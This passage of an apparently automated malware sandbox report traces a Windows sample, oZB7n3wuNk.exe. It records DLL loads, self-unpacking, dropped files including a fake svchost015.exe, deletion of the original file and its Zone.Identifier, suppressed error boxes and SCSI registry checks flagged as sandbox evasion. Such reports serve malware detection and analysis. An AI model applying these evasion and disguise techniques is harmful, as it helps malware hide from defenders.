              Source: C:\Windows\explorer.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: starttiledata.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: idstore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: usermgrproxy.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.applicationmodel.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wlidprov.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sndvolsso.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windowmanagementapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: inputhost.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: appextension.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.cloudstore.schema.shell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: d3d10warp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dxcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: d2d1.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cldapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fltlib.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: tiledatarepository.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: staterepository.core.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepository.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: explorerframe.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: twinui.pcshell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wincorlib.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cdp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dsreg.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.immersiveshell.serviceprovider.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorycore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mrmcorer.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: languageoverlayutil.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bcp47mrm.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: thumbcache.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: twinui.appcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: twinui.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pdh.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: applicationframe.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: photometadatahandler.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ntshrui.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cscapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: linkinfo.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: stobject.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wmiclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: workfoldersshell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: holographicextensions.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: virtualmonitormanager.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.immersive.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: abovelockapphost.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ehstorshell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cscui.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: provsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: npsm.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.web.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.shell.bluelightreduction.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mscms.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: coloradapterclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.signals.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: tdh.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.staterepositorybroker.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mfplat.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rtworkq.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: taskflowdatauser.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: structuredquery.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: actxprxy.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.security.authentication.web.core.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.data.activities.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.system.launcher.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.ui.shell.windowtabmanager.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: notificationcontrollerps.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.devices.enumeration.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.globalization.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: icu.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswb7.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: devdispitemprovider.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.networking.connectivity.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windowsudk.shellcommon.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dictationmanager.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: uianimation.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pcshellcommonproxystub.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cryptngc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cflapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: daxexec.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: container.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: shellcommoncommonproxystub.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: uiautomationcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: capabilityaccessmanagerclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: batmeter.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: inputswitch.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: prnfldr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.ui.shell.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dxp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: syncreg.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: actioncenter.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wscinterop.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wscapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: pnidui.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mobilenetworking.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wpnclient.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: networkuxbroker.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: werconcpl.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wer.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: hcproviders.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ethernetmediamanager.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dusmapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wlanapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wpdshserviceobj.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: portabledevicetypes.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: portabledeviceapi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: storageusage.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cscobj.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: srchadmin.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: fhcfg.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: efsutil.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: netapi32.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.storage.search.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: synccenter.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ncsi.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: imapi2.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.system.userprofile.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: cloudexperiencehostbroker.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: ieproxy.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: bluetoothapis.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: credui.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wdscore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: dbgcore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: settingsync.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: settingsynccore.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: windows.internal.shell.broker.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: wpnapps.dllJump to behavior
              Source: C:\Windows\explorer.exeSection loaded: msxml6.dllJump to behavior
              Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
              Source: oZB7n3wuNk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

              Data Obfuscation

              barindex
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeUnpacked PE file: 0.2.oZB7n3wuNk.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\AppData\Roaming\birajciUnpacked PE file: 4.2.birajci.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:EW;
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00403245 push eax; ret 0_2_00403276
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00403267 push eax; ret 0_2_00403276
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401C0A pushad ; iretd 0_2_00401C5C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0040321E push eax; ret 0_2_00403276
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401C23 pushad ; iretd 0_2_00401C5C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401C27 pushad ; iretd 0_2_00401C5C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00403235 push eax; ret 0_2_00403276
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401BF2 pushad ; iretd 0_2_00401C5C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401BF3 pushad ; iretd 0_2_00401C5C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_00401BFE pushad ; iretd 0_2_00401C5C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_004010A9 push 1A43E3D0h; retf 0_2_004010B3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064D44B push eax; ret 0_2_0064D49A
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064CEF5 push 0CEB7905h; retf 0_2_0064CEFA
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064B7B2 push 1A43E3D0h; retf 0_2_0064B7BC
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064C2BB push edx; retn 0063h0_2_0064C2C4
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064D483 push eax; ret 0_2_0064D49A
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_0064C18D pushad ; iretd 0_2_0064C23C
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C71 pushad ; iretd 0_2_007A1CC3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C65 pushad ; iretd 0_2_007A1CC3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C5A pushad ; iretd 0_2_007A1CC3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C59 pushad ; iretd 0_2_007A1CC3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1110 push 1A43E3D0h; retf 0_2_007A111A
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C8A pushad ; iretd 0_2_007A1CC3
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeCode function: 0_2_007A1C8E pushad ; iretd 0_2_007A1CC3
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00403245 push eax; ret 4_2_00403276
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00403267 push eax; ret 4_2_00403276
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401C0A pushad ; iretd 4_2_00401C5C
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_0040321E push eax; ret 4_2_00403276
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401C23 pushad ; iretd 4_2_00401C5C
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00401C27 pushad ; iretd 4_2_00401C5C
              Source: C:\Users\user\AppData\Roaming\birajciCode function: 4_2_00403235 push eax; ret 4_2_00403276
              Source: oZB7n3wuNk.exeStatic PE information: section name: .text entropy: 7.6644446499082015
              Source: birajci.2.drStatic PE information: section name: .text entropy: 7.6644446499082015
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeFile created: C:\Users\user\AppData\Local\Temp\svchost015.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9A25.exeJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\birajciJump to dropped file
              Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\birajciJump to dropped file

              Hooking and other Techniques for Hiding and Protection

              barindex
              Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\ozb7n3wunk.exeJump to behavior
              Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\birajci:Zone.Identifier read attributes | deleteJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\9A25.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
              Source: C:\Users\user\Desktop\oZB7n3wuNk.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
